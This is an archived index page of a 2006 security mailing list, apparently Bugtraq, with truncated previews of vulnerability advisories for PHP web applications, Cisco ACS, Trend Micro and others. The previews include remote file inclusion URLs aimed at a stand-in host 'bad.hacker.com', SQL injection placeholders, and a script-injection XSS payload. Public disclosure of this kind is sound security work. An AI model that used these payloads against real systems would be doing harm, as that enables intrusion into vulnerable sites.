|
|
Colapse all |
Post message
[Kil13r-SA-20060622-2] Namo DeepSearch 4.5 Cross-Site Scripting Vulnerability 2006-06-22 mac68k gmail com phpBlueDragon CMS 2.9.1 multiple remote file inclusion vuln 2006-06-22 rozowa landrynka spam nation pl PHPBlueDragon CMS <= 2.9.1 http://phpbluedragon.net/ Affected files: root_includes/root_modules/team_admin.php?action=move_item&template_redi rect=yes&vsDragonRootPath=http://bad.hacker.com:6666/ root_includes/root_modules//rss_admin.php?action=move_item&template_redi rect=yes&vsDragonRootPat [ more ] [ reply ] [ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion 2006-06-22 the_day echo or id ECHO.OR.ID ECHO_ADV_34$2006 ------------------------------------------------------------------------ --------------------------- [ECHO_ADV_34$2006] W-Agora (Web-Agora) <= 4.2.0 (inc_dir) Remote File Inclusion ------------------------------------------------------------------------ ------------- [ more ] [ reply ] WBB<<---v2.3.1"report.php" SQL Injection 2006-06-22 CrAzY CrAcKeR hotmail com ======================================== Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Breeeeh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r ======================================== Example:- /report.php?postid=[SQL] ======== [ more ] [ reply ] Re: Opera 9 DoS PoC 2006-06-22 Darren Clarke (mailcentre2 gmail com) Tested and confirmed on Opera 9.00 built 8482. Interesting this also managed to crash Notepad.exe on Windows XP SP2 Home Edition when viewing the source of the page in IE7 Beta 2. Darren Clarke IT / Comms Admin --------------------------------------------------------------------- Critical Security [ more ] [ reply ] [KAPDA]MyBB1.1.3~Option update for code buttons~Sql Injection Admin Access 2006-06-22 addmimistrator gmail com ORIGINAL ADVISORY: http://myimei.com/security/2006-06-21/mybb113option-update-for-code-butt onssql-injection-admin-access.html http://www.kapda.ir/page-advisory.html ??????-Summary?????- Software: MyBB Sowtware?s Web Site: http://www.mybboard.com Versions: 1.1.3 Class: Remote Status: Patche [ more ] [ reply ] Dating biz@ dating script v1.0 - XSS 2006-06-22 luny youfucktard com Custom dating biz@ dating script v1.0 Homepage: http://www.e-cbd.biz/php_dating_script.html Affected files: *Profiles user_view.php photo_create.php --------------------------------- The edit profile form can be spoofed and a user can enter any data he wishes and it will update his p [ more ] [ reply ] WBB<<---v1.2 "showmods.php" SQL Injection 2006-06-22 CrAzY CrAcKeR hotmail com ======================================== Discovered By: CrAzY CrAcKeR Site:www.alshmokh.com I want to thank my friend:- nono225-mHOn-rageh-Lover Hacker-Breeeeh BoNy_m-Rootshill-LiNuX_rOOt-Sw33t h4ck3r ======================================== Example:- /showmods.php?boardid=[SQL] ===== [ more ] [ reply ] Linux VNC evil client patch - BID 17978 2006-06-23 embyte madlab it Hi all, I have done a patch to current Linux VNC client (ver. 4.1.1), which permit to authenticate to a bugged server with a NULL session, although password authentication is required (RealVNC Remote Authentication Bypass Vulnerability, BID 17978). Here is the patch for file CConnection.cxx $ [ more ] [ reply ] rPSA-2006-0110-1 kernel 2006-06-23 Justin M. Forbes (jmforbes rpath com) rPath Security Advisory: 2006-0110-1 Published: 2006-06-23 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: kernel=/conary.rpath.com@rpl:devel//1/2.6.16.22-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cv [ more ] [ reply ] Re: Re: PHP security (or the lack thereof) 2006-06-21 nabiy hotmail com (1 replies) Trying to make the language 'safe' won't fix it because the language is not the problem. The real problem is the way PHP is presented to most new developers. PHP has been introduced as a tool for the web developer. As a language its goal is "to allow web developers to write dynamically generated [ more ] [ reply ] [Kil13r-SA-20060622-1] NetSoft SmartNet 2.0 Cross-Site Scripting Vulnerability 2006-06-22 mac68k gmail com Re: Bypassing of web filters by using ASCII 2006-06-23 Amit Klein (AKsecurity) (aksecurity hotpop com) On 23 Jun 2006 at 10:35, Vincent Archer wrote: > On Fri, Jun 23, 2006 at 12:08:56AM +0200, Amit Klein (AKsecurity) wrote: > > So what I don't understand now is why IE's "solution" is any better than Opera/Firefox? > > > > Why is modifying the data (msb) any better than modifying the data-descripti [ more ] [ reply ] Cisco Secure ACS Weak Session Management Vulnerability 2006-06-23 Darren Bounds (dbounds gmail com) Cisco Secure ACS Weak Session Management Vulnerability June 23, 2006 Product Overview: Cisco Secure Access Control Server (ACS) provides a centralized identity networking solution and simplified user management experience across all Cisco devices and security management applications. Cisco Secure [ more ] [ reply ] Dating Agent PRO 4.7.1 Vulnerability 2006-06-22 securityconnection gmail com Dating Agent PRO 4.7.1 http://www.datetopia.com/datingagent/ -------------------------------------- ------------- PHPinfo page /requirements.php ------------- SQL injection ------------- http://target.xx/picture.php?pid=1[SQL] http://target.xx/mem.php?mid=1[SQL] http://target.xx/search.ph [ more ] [ reply ] SYMSA-2006-005 2006-06-22 research symantec com -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Symantec Vulnerability Research http://www.symantec.com/research Security Advisory Advisory ID : SYMSA-2006-005 Advisory Title: Lanap CAPTCHA bypass exposure Author : Michael White, michael_white (at) symantec (dot) com [email concealed] and Graham Murphy, g [ more ] [ reply ] Trend Micro Control Manager (TMCM) Persistent XSS Vulnerability 2006-06-23 Darren Bounds (dbounds gmail com) Trend Micro Control Manager (TMCM) Persistent XSS Vulnerability June 23, 2006 Product Overview: Trend Micro Control Manager is a centralized, web-based outbreak management console designed to simplify enterprise-wide coordination of outbreak security actions and management of Trend Micro products a [ more ] [ reply ] aeDating 4.1 XSS 2006-06-22 securityconnection gmail com Product of AEwebworks Dating Software http://www.aewebworks.com/ --------------------------- Cross Site Scripting (XSS) --------------------------- http://target.xx:80/index.php?Sex="><script>alert(/Elipsis+Security+Test /)</script>&Mode=last ^"G4" Template work^ --- POST /join_form.php HTTP/ [ more ] [ reply ] Re: Re: MS Excel Remote Code Execution POC Exploit 2006-06-23 Juha-Matti Laurio (juha-matti laurio netti fi) "Steven M. Christey" <coley (at) mitre (dot) org [email concealed]> wrote: > > > > * Advisories: > > * http://www.microsoft.com/technet/security/advisory/921365.mspx > > * http://www.securityfocus.com/bid/18422/ > > There are at least three separate Excel issues that were published in > the past week. These references sugg [ more ] [ reply ] |
|
Privacy Statement |
[Kil13r-SA-20060622-2] Namo DeepSearch 4.5 Cross-Site Scripting Vulnerability
Author:
Kil13r - http://www.kil13r.info/
Local / Remote:
Remote
Timeline:
2006/06/21 - Discovery
2006/06/21 - Vendor notification
2006/06/21 - Vendor response
2006/06/22 - Release
Affected version
[ more ] [ reply ]